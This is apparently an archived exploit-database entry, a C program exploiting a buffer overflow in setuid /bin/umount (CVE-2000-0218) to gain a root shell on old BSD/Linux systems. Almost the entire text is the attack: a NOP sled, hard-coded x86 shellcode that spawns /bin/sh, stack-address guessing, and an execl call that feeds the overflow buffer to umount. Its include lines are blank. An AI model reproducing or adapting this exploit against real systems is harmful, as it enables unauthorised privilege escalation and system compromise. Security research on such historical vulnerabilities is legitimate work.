BSD / Linux - 'umount' Local Privilege Escalation - CVE-2000-0218

1. /* Reminder - Be sure to fix the includes /str0ke */
2. -------------------------------------- linux_umount_exploit.c ----------
3. #include
4. #include
5. #include
6. #include
7. #include
8. #include
9.  
10. #define PATH_MOUNT "/bin/umount"
11. #define BUFFER_SIZE 1024
12. #define DEFAULT_OFFSET 50
13.  
14. u_long get_esp()
15. {
16.   __asm__("movl %esp, %eax");
17.  
18. }
19.  
20. main(int argc, char **argv)
21. {
22.   u_char execshell[] =
23.    "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
24.    "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
25.    "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
26.  
27.    char *buff = NULL;
28.    unsigned long *addr_ptr = NULL;
29.    char *ptr = NULL;
30.  
31.    int i;
32.    int ofs = DEFAULT_OFFSET;
33.  
34.    buff = malloc(4096);
35.    if(!buff)
36.    {
37.       printf("can't allocate memory\n");
38.       exit(0);
39.    }
40.    ptr = buff;
41.  
42.    /* fill start of buffer with nops */
43.  
44.    memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
45.    ptr += BUFFER_SIZE-strlen(execshell);
46.  
47.    /* stick asm code into the buffer */
48.  
49.    for(i=0;i < strlen(execshell);i++)
50.       *(ptr++) = execshell[i];
51.  
52.    addr_ptr = (long *)ptr;
53.    for(i=0;i < (8/4);i++)
54.       *(addr_ptr++) = get_esp() + ofs;
55.    ptr = (char *)addr_ptr;
56.    *ptr = 0;
57.  
58.    (void)alarm((u_int)0);
59.    execl(PATH_MOUNT, "umount", buff, NULL);
60. }
61.  
62.  
63. // milw0rm.com [1996-08-13]
64.